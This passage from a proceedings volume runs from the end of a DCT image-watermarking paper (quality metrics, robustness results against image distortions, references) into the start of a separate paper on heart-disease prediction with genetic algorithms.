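    two chosen coefficients alone, so neither the host image nor the
    original watermark is needed (the scheme is blind)."""
    return 1 if dct_block[i] > dct_block[j] else 0

coeffs = np.array([[4.0, 9.0],
                   [2.0, 1.0]])
assert extract_bit(coeffs, (0, 1), (1, 0)) == 1   # bi = 9 > bj = 2 -> bit 1
assert extract_bit(coeffs, (1, 1), (0, 0)) == 0   # bi = 1 < bj = 4 -> bit 0
```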
For testing and evaluation of performance, PSNR, NC, SSIM and BER values are
used. These values helped to measure the quality of watermarking such as robustness
and imperceptibility.
PSNR (Peak Signal to Noise Ratio)
PSNR is used to compare the imperceptibility of the cover image and watermarked
image. It is expressed in terms of logarithmic decibel scale.
PSNR = 10 log10((L × L)/MSE)    (5)
Here, L denotes the peak signal value of the cover image, which is 255 for an 8-bit image. For better imperceptibility, a high PSNR is needed. MSE is applied to compare the quality of the image after inserting the watermark. It is measured as the cumulative squared error between the host image and the watermarked image; the lower the MSE, the better the result.
MSE = (1/(M × N)) Σ_{m=1}^{M} Σ_{n=1}^{N} [I1(m, n) − I2(m, n)]²    (6)
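Eqs. 5 and 6 can be computed as in the minimal sketch below; `peak` defaults to 255 for 8-bit images, as in the text.

```python
import numpy as np

def mse(host, marked):
    """Eq. 6: mean squared pixel difference over the M x N image."""
    d = host.astype(float) - marked.astype(float)
    return float(np.mean(d ** 2))

def psnr(host, marked, peak=255):
    """Eq. 5: 10 log10(L*L / MSE), with L = 255 for 8-bit images."""
    e = mse(host, marked)
    return float('inf') if e == 0 else float(10 * np.log10(peak * peak / e))

host = np.zeros((4, 4), dtype=np.uint8)
marked = host.copy()
marked[0, 0] = 16                      # a single altered pixel
assert mse(host, marked) == 16.0       # 16**2 spread over 16 pixels
assert abs(psnr(host, marked) - 36.09) < 0.01
```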
SSIM = ((2 μx μy + c1)(2 σxy + c2)) / ((μx² + μy² + c1)(σx² + σy² + c2))    (8)
where
μx indicates the average of x
μy indicates the average of y
σx² indicates the variance of x
σy² indicates the variance of y
σxy indicates the covariance of x and y
c1 = (k1 L)² and c2 = (k2 L)² are two variables that stabilize the division when the denominator is weak
L indicates the dynamic range of the pixel values, 2^(bits per pixel) − 1
k1 = 0.01 and k2 = 0.03 by default.
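Eq. 8 can be evaluated globally over two images as sketched below; the sliding-window averaging used by the full SSIM definition is omitted for brevity (a simplifying assumption).

```python
import numpy as np

def ssim_global(x, y, L=255, k1=0.01, k2=0.03):
    """Global SSIM (Eq. 8) computed over whole images; the sliding-window
    averaging of the full SSIM definition is omitted for brevity."""
    x = x.astype(float)
    y = y.astype(float)
    mx, my = x.mean(), y.mean()
    vx, vy = x.var(), y.var()
    cov = ((x - mx) * (y - my)).mean()
    c1, c2 = (k1 * L) ** 2, (k2 * L) ** 2
    return ((2 * mx * my + c1) * (2 * cov + c2)) / (
        (mx ** 2 + my ** 2 + c1) * (vx + vy + c2))

img = np.arange(64, dtype=float).reshape(8, 8)
assert abs(ssim_global(img, img) - 1.0) < 1e-9    # identical images
assert ssim_global(img, img + 10.0) < 1.0         # shifted copy scores lower
```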
Error Rate
BER = Number of error bits / Size of Image    (9)
PSNR values (in dB) of the watermarked images:

Image       PSNR (dB)
Cameraman   43.1369
Pepper      41.4201
Girl        43.3583
Barbara     41.4759
Fig. 3 SSIM values for the original image and watermarked image (bar chart; SSIM axis ranges from 0.74 to 0.92; test images: Lena, Barbara, Pepper, Girl, Cameraman)
The strength of each attack is varied, and the results are shown through bar charts in Figs. 4–9.
To check the robustness under the rotation attack, watermarked image is rotated by
−3° to +3° in increments of 1°. Results are shown in Fig. 4. It is apparent from the results that the minimum NC value is 0.97, which indicates good robustness. The NC value decreases as the degree of rotation increases. Gaussian
noise is added to the image; the level of noise is varied from 1 to 5% with the
increment of 1%. NC value remains close to one with little to no change when the
noise is varied from 1 to 3%, and later with an increase in noise, NC value decreased.
Results are shown by the help of a bar chart in Fig. 5.
Robustness under the cropping attack is checked by cropping the watermark from
0 to 50% with the increment of 10%. The value of robustness (NC value) stays close
to one till 20% cropping. After 20% cropping, there is a decrease in NC value for
further increment in cropping. Figure 6 shows that the proposed method achieved
encouraging results. In order to figure out the robustness of the proposed method
under the JPEG compression attack, robustness is checked over different values
of quality factor. Quality factor (QF) shows the amount of information preserved
after compression. Greater QF value would mean more information is preserved
under compression attack. The value of NC is 1 for all the test images under the
compression attack while the range of QF is in between 100 and 60, and after that,
NC value decreases as QF decreases. Results are shown in Fig. 7.
The proposed method is calculated for robustness under the median filter attack.
The filter size is varied from 1 × 1 to 5 × 5. The minimum value of NC is more
than 0.95 under all the variations of the attack. Figure 8 shows the results of the
introduced method under this attack. Under the Wiener filter attack, the value of NC
decreases when the filter size increases; the minimum value of NC is 0.95 for the
method. To calculate the robustness precisely, the filter size is varied from 1 × 1
to 5 × 5. Upon analysis under varied strengths of the attack, it is evident that the
Table 2 NC values and BER values of the proposed method

Attack                   Lena           Cameraman       Pepper          Girl            Barbara
                         BER     NC     BER     NC      BER     NC      BER     NC      BER     NC
No attack                0       1      0       1       0       1       0       1       0       1
Median filter            0       1      0       1       0       1       0       1       0       1
Average filter           0.039   0.96   0.017   0.9957  0.0043  0.9957  0.039   0.9606  0.0065  0.9935
Resize                   0       1      0       1       0       1       0       1       0       1
JPEG compression         0       1      0       1       0       1       0       1       0       1
Rotation                 0       1      0       1       0       1       0       1       0       1
Histogram equalization   0       1      0       1       0       1       0       1       0       1
Wiener filter            0       1      0       1       0       1       0       1       0       1
Gaussian filter          0       1      0       1       0       1       0       1       0       1
Translation              0.019   0.98   0.0025  0.9975  0.019   0.9808  0.011   0.989   0.003   0.997
Cropping                 0.019   0.98   0.0031  0.9969  0.011   0.9989  0.008   0.992   0.002   0.998
proposed method achieved great robustness as NC value lies in between 0.9 and 1.
Results are shown in Fig. 9.
Comparison with existing methods The proposed method is compared with several existing methods in terms of NC values and PSNR values, as shown in Tables 3 and 4. Table 3 shows that the existing methods achieve lower PSNR values than the introduced method, which indicates the better imperceptibility of this method. Table 4 shows that the proposed method obtains higher NC values than the existing methods. Under different attacks, the method achieves NC values close to 1, which is clear evidence of its robustness.
5 Conclusion
In this paper, the concepts of Shannon’s entropy in the DCT domain and water-
mark encryption are used to embed the watermark in the host image. The proposed
method embeds the watermark in such a way that extraction can be done blindly,
and at the same time, it provides a balance between robustness and imperceptibility.
The entropy-based block selection and encryption of the watermark with discrete
cosine transform give more reliable outcomes than common discrete cosine trans-
form methods in digital watermarking. Additionally, the watermarking technique is
secured for the reason that the process of encryption takes place before embedding
any watermark. The watermark persists under all the varied attacks as NC remains
close to value 1; this betokens that the method maintains high robustness. The image
continues to be imperceptible because the average PSNR value is 42.7362. The
proposed method is also adaptive, as embedding strength depends upon the charac-
teristics of the local block; this makes the method even more imperceptible. Results
are compared with existing methods [35, 47, 48], which authenticate that the proposed
method is relatively better.
References
1. Berghel, H., & O’Gorman, L. (1996). Protecting ownership rights through digital watermarking.
Computer, 29(7), 101–103.
2. Chang, C. C., Hwang, K. F., & Hwang, M. S. (2003). A digital watermarking scheme using
human visual effects. Informatica, 24(4), 505–511.
3. Alshanbari, H. S. (2020). Medical image watermarking for ownership and tamper detection.
Multimedia Tools Application.
4. Fazlali, H. R., Samavi, S., Karimi, N., et al. (2017). Adaptive blind image watermarking using
edge pixel concentration. Multimedia Tools Application, 76, 3105–3120.
5. Isinkaye, F., & Aroge, T. (2005). Watermarking techniques for protecting intellectual properties
in a digital environment. Journal of Computer Science and Technology, 12(27).
6. Giri, K., Quadri, S., & Bashir, R. (2018). DWT based colour image watermarking: A review.
Multimedia Tools Application, 79, 32881–32895.
7. Zebbiche, K., Khelifi, F., & Loukhaoukha, K. (2018). Robust additive watermarking in the
DTCWT domain based on perceptual masking. Multimedia Tools Application, 77, 21281–
21304.
8. Escalante-Ramírez, B., & Gomez-Coronel, S. L. (2018). A perceptive approach to digital image
watermarking using a brightness model and the Hermite transform. Mathematical Problems in
Engineering, 2018, 19. Article ID 5463632.
9. Gaaed, M., Almutiri, M. T., Ben, O. (2018). Digital image watermarking based on LSB
techniques: A comparative study. International Journal of Computer Applications.
10. Su, Q., Decheng, L., Zihan, Y., et al. (2019). New rapid and robust colour image watermarking
technique in spatial domain. IEEE Access, 7, 30398–30409.
11. AL-ardhi, S., Thayananthan, V., & Basuhail, A. (2020). A new vector map watermarking
technique in frequency domain based on LCA-transform. Multimedia Tools Application, 79,
32361–32387.
12. Agarwal, N., & Singh, P. (2019). Survey of robust and imperceptible watermarking. Multimedia
Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5.
13. Cox, I., Kilian, J., Leighton, F., & Shamoon, T. (1996). Secure spread spectrum watermarking
for multimedia. IEEE Transactions on Image Processing.
14. Khan, A. (2020). 2DOTS-multi-bit-encoding for robust and imperceptible image watermarking.
Multimedia Tools Application.
15. Singh, R., Shaw, D., Jha, S., & Kumar, M. (2017). A DWT-SVD based multiple watermarking
schemes for image-based data security. Journal of Information and Optimization Sciences, 39,
1–16. https://doi.org/10.1080/02522667.2017.1372153.
16. Feng, B., Yu, B., Bei, Y., & Duan, X. (2019). A reversible watermark with a new overflow
solution. IEEE Access, 7, 28031–28043.
17. Shih, F., & Zhong, X. (2016). Intelligent watermarking for high-capacity low-distortion data
embedding. International Journal of Pattern Recognition and Artificial Intelligence.
18. Savakar, D. G., & Ghuli, A. (2019). Robust invisible digital image watermarking using hybrid
scheme. Arabian Journal for Science and Engineering, 44, 3995–4008.
19. Garg, P., & Kishore, R. (2019). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79(35–36), 25921–25967.
20. Loan, N. A., Hurrah, N. N., Parah, S. A., Lee, J. W., Sheikh, J. A., & Bhat, G. M. (2018). Secure
and robust digital image watermarking using coefficient differencing and chaotic encryption.
IEEE Access, 6, 19876–19897.
21. Sanyal, N., Chatterjee, A., & Munshi, S. (2006). An adaptive bacterial foraging algorithm for
fuzzy entropy-based image segmentation. Expert Systems with Applications, 38(12), 15489–
15498.
22. Sharma, P. (2012). Analysis of image watermarking using least significant bit algorithm.
International Journal of Information Sciences and Techniques.
23. Boussif, M., Aloui, N., & Cherif, A. (2020). DICOM imaging watermarking for hiding medical
reports. Medical & Biological Engineering & Computing, 58, 2905–2918.
24. Byun, S., Son, H., & Lee, S. (2019). Fast and robust watermarking method based on DCT
specific location. IEEE Access, 7, 100706–100718.
25. Malik, S., & Reddlapalli, R. (2018). Histogram and entropy based digital image watermarking
scheme. International Journal of Information Technology.
26. Thanki, R., & Borra, S. (2019). Fragile watermarking for copyright authentication and tamper
detection of medical images using compressive sensing (CS) based encryption and contourlet
domain processing. Multimedia Tools Application, 78, 13905–13924.
27. Yang, C., Zhu, C., Wang, Y., et al. (2020). A robust watermarking algorithm for vector
geographic data based on QIM and matching detection. Multimedia Tools Application, 79,
30709–30733.
28. Mehta, R., Gupta, K., & Yadav, A. K. (2020). An adaptive framework to image watermarking
based on the twin support vector regression and genetic algorithm in lifting wavelet transform
domain. Multimedia Tools Application, 79, 18657–18678.
29. Deljavan, A., Meghdadi, M., & Amiri, A. (2018). HVS-based scalable image watermarking.
Multimedia Tools and Applications.
30. Celik, M., Sharma, U., Saber, G., & Tekalp, A. (2002). Hierarchical watermarking for secure
image authentication with localization. IEEE Transactions on Image Processing, 11(6), 585–
595.
31. Kumar, R., Das, R., Mishra, V., & Dwivedi, R. (2011). Fuzzy entropy-based neuro-wavelet
identifier-cum-quantifier for discrimination of gases/odours. IEEE Sensors Journal, 11(7),
1548–1555.
32. Alzubi, O. A., Nazir, J. A. A. S., & Hamdoun, H. (2015). Cyber attack challenges and resilience
for smart grids. European Journal of Scientific Research.
33. Yuan, Z., Liu, D., Zhang, X., & Su, Q. (2019). New image blind watermarking method based
on two-dimensional discrete cosine transform. Optik, 164152.
34. Zhang, L., Yan, H., Zhu, R., et al. (2020). Combinational spatial and frequency domains
watermarking for 2D vector maps. Multimedia Tools Application, 79, 31375–31387.
35. Garg, P., & Kishore, R. (2020). Secured and multi optimized image watermarking using SVD
and entropy and prearranged embedding locations in transform domain. Journal of Discrete
Mathematical Sciences and Cryptography, 23(1), 73–82.
36. Mohammed, A., Salih, D., Saeed, A., et al. (2020). An imperceptible semi-blind image water-
marking scheme in DWT-SVD domain using a zigzag embedding technique. Multimedia Tools
Application, 79, 32095–32118.
37. Kamble, S., Maheshkar, V., Agarawal, S. V. (2010). Robust multiple watermarking using
entropy based spread spectrum. Communications in Computer and Information Science (CCIS),
94, 497–507.
38. Gul, E., & Ozturk, S. (2020). A novel triple recovery information embedding approach for
self-embedded digital image watermarking. Multimedia Tools Application, 79, 31239–31264.
39. Mehta, R., Rajpal, N., & Vishwakarma, V. (2016). Adaptive Image Watermarking Scheme
Using Fuzzy Entropy and GA-ELM hybridization in DCT domain for copyright protection.
Journal of Signal Processing Systems, 84, 265–328.
40. Mokhtari, Z., & Melkemi, K. (2011). A new watermarking algorithm based on entropy concept.
Acta Applicandae Mathematicae, 116, 65–69.
41. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement.
42. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Gayathri, N., & Patan, R. (2019). A survey of
specific IoT applications. International Journal on Emerging Technologies.
43. Pevný, T., Filler, T., & Bas, P. (2010). Using high-dimensional image models to perform highly
undetectable steganography. In Proceedings of International Workshop on Information Hiding,
Calgary Canada (pp. 161–177).
44. Liu, X., et al. (2019). A novel robust reversible watermarking scheme for protecting authenticity
and integrity of medical images. IEEE Access, 7, 76580–76598.
45. Dappuri, B., Rao, M. P., & Sikha, M. B. (2020). Non-blind RGB watermarking approach using
SVD in translation invariant wavelet space with enhanced Grey-wolf optimizer. Multimedia
Tools Application, 79, 31103–31124.
46. Tyagi, S., Singh, H., & Agarwal, R. (2017). Image watermarking using genetic algorithm in
DCT domain. In International Conference on Inventive Systems and Control (ICISC).
47. Prabha, K., & Sam, S. (2020). A novel blind color image watermarking based on Walsh
Hadamard transform. Multimedia Tools Application, 79, 6845–6869.
48. Yuan, Z., Liu, D., Zhang, X., et al. (2020). DCT-based color digital image blind watermarking
method with variable steps. Multimedia Tools Application, 79, 30557–30581.
Prediction of Heart Disease Using
Genetic Algorithm
1 Introduction
Machine learning (ML) is a science that enables a computer to learn on its own from the training process, without being explicitly programmed. ML algorithms can analyze historical data sets from different sources. Machine learning techniques involve two types of data sets: a training data set needed to train the model or algorithm, and a test data set used to evaluate the model's predictions and classifications.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_4
N. M. Lutimath et al.
Across the world, one of the major causes of death among humans is heart attack.
People with heart disorders suffer from severe illness, physical disability, and
decreased quality of life. By identifying the proper risk factors, heart diseases
can be detected early and controlled. Timely detection, diagnosis, and treatment
will also reduce deaths related to heart disease. Early identification of heart
disease is a critical issue, and traditional methods are ineffective in identifying
the presence of such diseases. Current techniques such as AI and machine learning
are therefore more accurate, reliable, and effective in detecting and diagnosing people
with heart ailments, leading to a reduction in the mortality rate.
The proposed work uses genetic algorithms to auto-tune classification methods
such as random forest, XGBoost, and neural networks. The genetic algorithms
improve the classification algorithms' performance by identifying the most
prominent features in the heart disease data set, and they determine the
weights associated with the features in the neural networks in fewer iterations.
The Z-Alizadeh Sani data set, with ECG, echocardiography, demographic, and
laboratory examination details of 303 patients, is used. The genetic algorithm model's
computational results show that the overall performance can be further improved by
an ensemble process giving equal importance to all three models. Better
prediction accuracy of the disease was observed using classification procedures such
as AdaBoost, bagged trees, random forest, and majority-voted output [1].
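Genetic-algorithm-based feature selection of the kind described above can be sketched in a few lines of Python. This is a minimal illustration only: the fitness function below is a hypothetical stand-in (a real implementation would train a classifier on the selected columns), and the population size, rates, and "informative" indices are arbitrary assumptions, not the authors' configuration.

```python
import random

random.seed(42)

N_FEATURES = 13      # number of attributes in the heart disease data set
POP_SIZE = 20
GENERATIONS = 30


def fitness(chromosome):
    # Hypothetical stand-in for classifier accuracy: reward a small,
    # informative subset.  A real run would fit a model here instead.
    informative = {1, 2, 7, 9, 11}           # assumed "useful" features
    hits = sum(1 for i in informative if chromosome[i])
    cost = sum(chromosome) / N_FEATURES      # penalize large subsets
    return hits - cost


def crossover(a, b):
    point = random.randrange(1, N_FEATURES)
    return a[:point] + b[point:]


def mutate(chromosome, rate=0.05):
    return [1 - g if random.random() < rate else g for g in chromosome]


# Each chromosome is a 0/1 mask over the feature columns.
population = [[random.randint(0, 1) for _ in range(N_FEATURES)]
              for _ in range(POP_SIZE)]

for _ in range(GENERATIONS):
    population.sort(key=fitness, reverse=True)
    parents = population[:POP_SIZE // 2]     # elitist selection
    children = [mutate(crossover(random.choice(parents), random.choice(parents)))
                for _ in range(POP_SIZE - len(parents))]
    population = parents + children

best = max(population, key=fitness)
selected = [i for i, g in enumerate(best) if g]
print("selected feature indices:", selected)
```

The same loop applies unchanged when the fitness function instead returns a classifier's validation accuracy on the masked columns, which is how such a GA tunes random forest, XGBoost, or neural network inputs.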
The heart is a vital organ that pumps blood to the various organs of the body.
Other vital organs such as the kidneys and brain need a sufficient supply of oxygen for their
functioning. Medical professionals such as cardiologists and thoracic, vascular, and inter-
ventional radiologists treat cardiovascular diseases. The WHO has estimated around 12
million deaths due to heart disorders every year worldwide [2].
The rest of the paper is organized as follows: Sect. 2 describes the existing
literature and related work; Sect. 3 describes the classification procedure; Sect. 4
describes the classification methods used; Sect. 5 describes the characteristic feature
engineering of the attributes in the data set; Sect. 6 deals with prediction and
performance analysis; and Sect. 7 concludes the paper.
2 Related Work
Classification is a key learning concept in machine learning. It has three basic forms,
namely supervised, unsupervised, and semi-supervised classification. A prediction
model can be created using any of the three learning procedures with a suitable
training data set. A heart disease diagnosis framework with machine intelligence was
presented for analysis [3]. The proposed framework was used to predict the records of
heart patients, and factor analysis of mixed data (FAMD) was utilized
to extract derived attributes from the UCI heart disorder data set; the holdout vali-
dation approach was used for validation. An association rule approach for classifying
data sets efficiently was used, and appropriate rules were generated for heart disorders [4].
The rules were prioritized and also categorized into original rules
and pruned rules. The proposed system was efficient in decision making based on the
specified parameters. During the training of the model, a tenfold validation method was
used, and accuracies of 86.3% and 87.3% were achieved in the training and testing
phases, respectively. Neural networks for prediction have been studied by many researchers.
The quality of prediction can be improved using neural network models. A hybrid
approach, in which a neural network is augmented by a genetic algorithm, was
proposed for the diagnosis of heart disorders [5]. The initial weights of
the neural network can be enhanced using genetic algorithms, and the performance
of the neural network was subsequently increased by 10%. During performance anal-
ysis, accuracy, sensitivity, and specificity rates of 93%, 97%, and 92%, respectively, were achieved.
The Z-Alizadeh Sani data set was used for analysis. Computer-aided techniques
are essential for the automated identification of persons suffering from heart disorders. An
automated classification procedure to distinguish between normal and heart disease patients
from ECG signals, applying higher-order statistics and spectra, was proposed [6].
Automated heart disorder identification using a nonlinear HOS attribute extraction
approach on ECG signals was performed. A capable result was achieved when normal
and heart-disorder-affected ECG signals were used: with 31 cumulant features, an
accuracy of 98.99% was achieved. In recent times, deep learning has become one
of the important areas of machine learning; it is concerned with multilayer neural
networks and is motivated by the functioning and structure of the human brain. To
enhance the deep learning method, a deep belief network with an optimal configuration
for the prediction of heart disease, based on Ruzzo–Tompa and a stacked genetic algorithm, was
proposed in [7]. Some of the important attributes were used for prediction of
heart disorders along with three different classification methods: XGBoost,
random forest, and neural networks were used with genetic algorithms [8]. The most
important attributes were used for maximizing classification accuracy on the Z-Alizadeh Sani
data set of 303 patients with demographic examinations. The performance accu-
racy of the prediction model can be improved by choosing the correct sequence of
characteristic features. Research should aim to improve the accuracy of predicting
the presence of cardiovascular disease by identifying significant features and
data mining techniques [9]. Prediction models were developed by combining
characteristic feature engineering on the data sets with classification tech-
niques such as decision tree, naive Bayes, K-nearest neighbor, artificial neural
networks, the logistic regression (LR) model, and the support vector machine (SVM), to
name a few. The vote-based model predicted heart disease with an accuracy of 87.4%
using the vital specified features [10]. Multivariate analysis
is one of the vital methods in attribute selection. Logistic regression is utilized in
a machine learning classification approach together with artificial neural networks. Along
with these classification techniques, evolutionary algorithms have evolved as one
of the important procedures for building prediction models [11]. In recent years, investi-
gation and research into classification techniques have drawn attention among
researchers, and improving the accuracy of classification ensembles has become an
ultimate goal. Deep learning is also a vital technique for classification [12]. An inno-
vative metaheuristic method with feature extraction and prediction was introduced in [13].
3 Classification
4 Classification Methods
In the proposed work, we consider an important method for classification, namely an
artificial neural network combined with a genetic algorithm.
The artificial neural network is a perceptron network that can consist of
multiple layers. A single-layer perceptron with no hidden layers can solve only
problems that are linearly separable, but many current real-world
problems are not linearly separable and are complex. To solve such problems, multi-
layer neural networks with one or more hidden layers, together with error functions,
are added between the input and output layers. These multilayer perceptron networks
are also known as feed-forward neural networks. Multilayer neural networks
are used for medical image and data diagnostics, pattern recognition, classification
of input patterns, and autonomous vehicles.
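The point about linear separability can be made concrete with XOR, the classic problem that a single-layer perceptron cannot represent but one hidden layer can. The sketch below uses hand-chosen weights purely for illustration; a real network, including the one in this paper, would learn its weights by training rather than have them fixed by hand.

```python
# XOR is not linearly separable, so no single-layer perceptron computes it.
# One hidden layer suffices.  Weights are hand-chosen for illustration.

def step(x):
    return 1 if x > 0 else 0

def mlp_xor(x1, x2):
    h1 = step(1.0 * x1 + 1.0 * x2 - 0.5)    # hidden unit: acts like OR
    h2 = step(1.0 * x1 + 1.0 * x2 - 1.5)    # hidden unit: acts like AND
    return step(1.0 * h1 - 1.0 * h2 - 0.5)  # output: OR and not AND = XOR

for a in (0, 1):
    for b in (0, 1):
        print(a, b, "->", mlp_xor(a, b))
```

Running the loop prints 0 for the (0, 0) and (1, 1) inputs and 1 for the mixed inputs, which no weighting of a single layer over x1 and x2 can reproduce.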
5 Feature Engineering
The heart disorder data set from the UCI repository is used for the classifi-
cation process. Training and test data sets are obtained by segregating the data set. During
feature engineering, we consider suitable attributes for training the model. The trained
classification model is then used to predict the class of the examples in the test data.
The feature attributes contributing to the prediction of heart disease are defined
as data fields, as shown below. The data set has the following attributes:
c_age—The age of the patient in years.
c_sex—The sex of the patient, with a value of 1 for male and 0 for female.
c_cp—The chest pain category: typical angina, atypical angina, non-anginal pain,
and asymptomatic, with values 1, 2, 3, and 4, respectively.
c_trestbps—The resting blood pressure when the patient is admitted, measured
in mmHg.
c_chol—The serum cholesterol, measured in mg/dl.
c_fbs—The level of fasting blood sugar: true (1) when the measured fasting
blood sugar is more than 120 mg/dl, otherwise false (0).
c_restecg—The resting ECG result: 0 for normal; 1 for ST-T wave abnormality with
T-wave inversion and/or ST elevation or depression of >0.05 mV; 2 for definite
left ventricular hypertrophy by Estes' criteria.
c_thalach—The maximum heart rate achieved by the patient.
c_exang—Exercise-induced angina, with a value of 1 for yes and 0 for no.
c_oldpeak—The ST depression induced by exercise relative to rest.
c_slope—The slope of the peak exercise ST segment, with values 1, 2, and 3 for
up-sloping, flat, and down-sloping, respectively.
c_ca—The count of major vessels (0 to 3) colored by fluoroscopy.
c_num—The predicted class, indicating the presence of heart disorder.
Out of the 303 tuples in the Cleveland heart disease data set from the UCI
repository, 212 examples are used during the training phase and the others are used as
records in the test data. The data sets for training and testing are created using Python
code as shown in Eq. (1).
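Equation (1) itself is not reproduced in this extract. A split along the lines described (212 of 303 records for training) might look like the following sketch; the synthetic records and random seed are placeholders, not the paper's actual code or data.

```python
import random

random.seed(0)

# 303 records as (features, label) pairs.  The real data comes from the
# UCI Cleveland heart disease repository; these are synthetic placeholders.
records = [([random.random() for _ in range(13)], random.randint(0, 1))
           for _ in range(303)]

random.shuffle(records)
train_data = records[:212]   # 212 examples for the training phase
test_data = records[212:]    # remaining 91 records form the test data

print(len(train_data), len(test_data))
```
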
The genetic algorithm used to train the model is given by Eqs. 2 and 3 in
Python: in Eq. 2, the logistic model is fitted, and in Eq. 3, the genetic
model is developed.
logmodel.fit(X_train.iloc[:, chromo[-1]], y_train) (2)
The three performance measures used in this work for predictive analysis are the
mean absolute error (MAE), which is the mean of the absolute differences between
the actual and predicted values, the mean squared error (MSE), and the root mean
squared error (RMSE).
MAE is given by,

MAE = (1/n) Σ_{i=1}^{n} |y_i − o_i| (4)

In Eq. 4, MAE is the mean absolute error, y_i is the ith actual data set value, and o_i is the
ith predicted data set value.
RMSE is defined as the square root of the average of the squared errors. It is given
by,

RMSE = √((1/n) Σ_{i=1}^{n} (y_i − o_i)²) (5)

MSE is given by,

MSE = (1/n) Σ_{i=1}^{n} (y_i − o_i)² (6)

In Eq. 6, MSE is the mean squared error, y_i is the ith actual instance value in the
data set, o_i is the ith predicted instance value, and n indicates the number
of test samples.
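The three measures follow directly from their definitions; the listing below is a minimal sketch, with illustrative label vectors that are not the paper's data.

```python
import math

def mae(actual, predicted):
    # Mean of the absolute differences between actual and predicted values.
    return sum(abs(y - o) for y, o in zip(actual, predicted)) / len(actual)

def mse(actual, predicted):
    # Mean of the squared differences.
    return sum((y - o) ** 2 for y, o in zip(actual, predicted)) / len(actual)

def rmse(actual, predicted):
    # Square root of the mean squared error.
    return math.sqrt(mse(actual, predicted))

actual = [1, 0, 1, 1, 0]        # illustrative labels only
predicted = [1, 0, 0, 1, 1]
print(mae(actual, predicted))   # 0.4
print(mse(actual, predicted))   # 0.4
print(rmse(actual, predicted))  # ~0.632
```

For 0/1 class labels MAE and MSE coincide, as here; they diverge once predictions are real-valued scores.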
6 Prediction Analysis
In this study of prediction analysis, preprocessing of the data set is done first:
missing data are represented by the mean of the corresponding attribute values.
The performance measures used during the prediction process are MAE, RMSE, and MSE,
calculated using the training and test models on the heart disease data set. Observing
Table 1, the value of MAE is lower than those of MSE and RMSE. In Table 2, we find
that MAE and MSE are minimum when c_sex is female, with values of 0.44 and 1.06,
respectively; thus, when the c_sex attribute represents female, the model gives better predictions.
Looking at Table 3, we observe that when c_cp equals 1, MAE and MSE have
their lowest values of 0.29 and 0.29, respectively. Thus, the c_cp attribute contributes to
improved prediction accuracy of the model. Deviation from the actual values is observed
in the prediction model when MAE and MSE have their highest values of 0.95 and 2,
respectively. Now analyzing the contents of Table 4, we observe that MAE and MSE
Table 3 Values of MAE, MSE, and RMSE for the categories of attribute c_cp

Type_of_error   c_cp = 1   c_cp = 2   c_cp = 3   c_cp = 4
MAE             0.29       0.33       0.36       0.95
MSE             0.29       0.73       0.92       2
RMSE            0.53       0.86       0.96       1.41
have minimum values of 0.50 and 0.50, respectively, when the c_slope attribute is 3; in
this case, the prediction model provides better accuracy. When c_slope has a value
of 2, MAE and MSE have their highest values of 0.76 and 1.71, respectively, as shown in Table
4, which makes the prediction model deviate from the actual values. Considering the
attributes c_sex, c_cp, and c_slope together, MAE has a low value of 0.29, which occurs
when c_cp has a value of 1; thus, the attribute c_cp provides the best
prediction. We also obtain a minimum RMSE value of 0.53 when the attribute
c_cp has a value of 1.
7 Conclusion
In this paper, a genetic algorithm is utilized to predict heart disease among patients.
We have used the heart disease data set available at the UCI machine learning
repository. The performance measures MAE, MSE, and RMSE are calculated using a
feature engineering technique on the attributes of the heart disease data set, and the male
and female categories of the sex attribute are also analyzed. The RMSE consistency
measures indicate that the model predicts heart disease more reliably for females than
for males. In future, the accuracy of the prediction can be improved by utilizing other
machine learning methods, such as deep neural networks and association rule mining,
with other performance measures.
References
1. Yekkala, I., & Dixit, S. (2018). Prediction of heart disease using random forest and rough set
based feature selection. International Journal of Big Data and Analytics in Healthcare, 3(1),
1–12.
2. Bhuvaneswari Amma, N. G. (2012). Cardiovascular disease prediction system using genetic
algorithm and neural network. In International Conference on Computing, Communication
and Applications, Dindigul, Tamilnadu, India (pp. 1–5). IEEE.
3. Gupta, A., et al. (2020). A machine intelligence framework for heart disease diagnosis. IEEE
Access, 8, 14659–14674.
4. Purushottam, K. S., & Sharma, R. (2016). Efficient heart disease prediction system. Procedia
Computer Science, 85, 962–969.
5. Arabasadi, Z., Alizadehsani, R., Roshanzamir, M., Moosaei, H., & Yarifard, A. A. (2017).
Computer aided decision making for heart disease detection using hybrid neural network-
Genetic algorithm. International Journal of Computer Methods and Programs in Biomedicine,
141, 19–26.
6. Acharya, U. R., Sudarshan, V. K., Koh, J. E. W., Martis, R. J., Tan, J. H., Oh, S. L.,
Muhammad, A., Hagiwara, Y., Mookiah, M. R. K., Chua, K. P., Chua, C. K., & Tan,
R. S. (2017). Application of higher-order spectra for the characterization of Coronary artery
disease using electrocardiogram signals. Biomedical Signal Processing and Control, 31, 31–43.
7. Ali, S. A., Raza, B., Malik, A. K., Shahid, A. R., Faheem, M., Alquhayz, H., & Kumar, Y.
J. (2020). An optimally configured and improved deep belief network (OCI-DBN) approach for
heart disease prediction based on Ruzzo–Tompa and stacked genetic algorithm. IEEE Access,
8, 65947–65958.
8. Yekkala, I., & Dixit, S. (2020). A novel approach for heart disease prediction using genetic
algorithm and ensemble classification. In Proceedings of SAI Intelligent Systems Conference,
Intelligent Systems and Applications (pp. 468–489). Springer.
9. Amin, M. S., Chiam, Y. K., & Varathan, K. D. (2019). Identification of significant features and
data mining techniques in predicting heart disease. Telematics and Informatics, 36, 82–93.
10. Wiharto, H. K., & Herianto, H. (2017). Hybrid system of tiered multivariate analysis and arti-
ficial neural network for coronary heart disease diagnosis. International Journal of Electrical
and Computer Engineering (IJECE), 7(2), 1023–1031. ISSN 2088-8708. https://doi.org/10.
11591/ijece.v7i2.pp1023-1031.
11. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-020-04761-6.
